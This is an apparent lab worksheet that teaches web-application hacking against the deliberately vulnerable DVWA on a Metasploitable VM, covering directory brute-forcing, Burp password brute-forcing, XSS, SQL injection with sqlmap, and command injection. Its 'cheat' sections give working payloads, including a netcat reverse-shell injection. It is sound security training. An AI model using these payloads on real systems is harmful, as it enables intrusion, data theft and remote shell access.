Hacking Web Applications

Exercise 1: Recon with gobuster

Gobuster is a brute-force tool, written in Go and a more modern alternative to Dirbuster.

Tools like gobuster use “wordlists”, or a file that contains many (many!) words that are used to find directories, files, crack passwords, etc.

In Kali, you can see installed wordlists by opening a terminal and running locate wordlists. Additionally, we have cloned the SecLists Github repo to /root/websploit/SecLists:

SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.

Task 1

Metasploitable is “an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.” In the lab network, there is a Metasploitable machine reachable at http://metasploitable. The Metasploitable machine is running a web application called “DVWA” (Damn Vulnerable Web App) which also has gaping security holes we will exploit in these exercises. The DVWA web app is accessible at http://metasploitable/dvwa.

Try running gobuster on DVWA. You can use any wordlist you want– there are some in /root/websploit/SecLists or /usr/share/wordlists/dirbuster/.

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gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://metasploitable/dvwa/

Exercise 2: Brute Forcing a Password using Burp Suite

In this exercise, we’ll set up Burp Suite with Firefox, learn some Burp Suite basics, and brute force a password using Burp Suite’s Intruder tool.

Task 1

In your Kali machine, open Burp Suite. Since we’re using the free Community Edition, you can only start a temporary project. When asked, select Use Burp Defaults.

Note: it may take a minute for Burp Suite to start.

Burp Suite works by proxying network traffic between your browser and the web server. To use it properly, we need to configure a browser to send traffic through Burp Suite.

  1. Open Firefox. Go to about:preferences -> General -> scroll to the bottom -> Network settings.
  2. Click “Manual proxy configuration”, and set the host to and the port to 8080. Check the “Use this proxy for HTTPS” box. Click OK.

Firefox proxy settings

  1. Next, navigate to http://metasploitable/dvwa in Firefox. You should see the DVWA login page.
  2. In Burp Suite, go to Proxy -> HTTP History. You should see the request that Firefox just sent, and the response.

At this point, if you’ve never used Burp Suite before, just spend a minute clicking around the interface and reading– it’s overwhelming at first, so just try to get your bearing. Burp Suite has a lot of builtin tools.

Task 2

  1. Navigate to DVWA and login using username admin and password password.
  2. On the left sidebar, click “DVWA Security”, and set the security level to Low.
  3. On the left sidebar, click “Brute Force.” Attempt to login with admin and a dumb password like 1234.
  4. In Burp Suite, find the login request you just sent (it will be a POST /vulnerabilities/brute). Right click -> click “Send to Intruder”.
  5. Along the top tabs in Burp Suite, you should see “Intruder”– it should be highlighted in orange because you just sent something new to it. Click the tab.
  6. You should be in the “Positions” tab by default– start here. At the bottom, it should say 0 payload positions. If not, click Clear on the right side.
  7. Highlight the password you entered (NOT the surrounding quotes), and click “Add”. It will surround the password in a special character.
  8. Go to the next tab, “Payloads”. Here, we’ll specify what words Burp Suite should try to use to log in. In “Payload Settings”, click Load ... and choose a wordlist. I recommend using /usr/share/wordlists/john.lst.
  9. Go to the last tab, “Settings”. Scroll to “Grep - Match”. Check the box that says “Flag result items with responses matching these expressions:”. There’s a good default list, but add “Welcome” to the list (we’re cheating a bit here).

  1. Scroll down again to Redirections. Under “Follow redirections:”, select Always.

  2. At the top, click Start Attack. If you used john.lst, you should see pretty quickly that one of the passwords gave a result that was flagged for the string “Welcome” (hint: you already logged in with the admin password earlier…)

Exercise 3: Reflected XSS

In Firefox, navigate to http://metasploitable/dvwa, and click on XSS reflected in the left panel. Exploit the text input using XSS.

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You just XSS’d yourself, which isn’t really that great. Consider: how could you XSS someone else with this exploit?

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The XSS attack is embedded in the URL, so you could send someone a link with your XSS parameters pre-filled in. If they click it when they're logged in, the code will run on their machine. If you think your XSS link words, try logging into a private Firefox window and pasting the link. Did it work?

Exercise 4: Stored XSS

In Firefox, navigate to http://metasploitable/dvwa, and click on XSS stored in the left panel. Exploit the text input using XSS. This should be very easy given the previous exercise.

Once you’re done, try refreshing the page, or visiting the page in a private Firefox window. Does the exploit still work?

Exercise 5: SQL Injection

Task 1

In Firefox, navigate to http://metasploitable/dvwa, and click on SQL Injection in the left panel. Enumerate users on the system with an SQL injection.

+ Click here for Cheat
    a' or 'a' = 'a

Task 2

Use SQLMap to dump the database. You’ll need to copy your cookie(s) from Firefox.

+ Click here for Cheat
    sqlmap --cookie="PHPSESSID=<your PHPSESSID>;security=low" --url="http://metasploitable/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dump

Exercise 6: Command Injection

Task 1

In Firefox, navigate to http://metasploitable/dvwa, and click on Command Execution in the left panel. Inject the id command.

Task 2

Spawn a reverse shell using Netcat. Here is a reverse shell cheat sheet.

Task 2a

Start a listener using netcat from Kali.

Create a listener
	nc -v -l -p 4444

Task 2b

Inject a command that calls back to the netcat listener, and gives you a shell.

+ Click here for Cheat Inject this command:
	localhost && nc -e /bin/bash kali 4444
It's normal not to have a prompt -- type commands as you normally would anyway.

What is the uptime of the system?

+ Click here for Cheat Run the `uptime` command.
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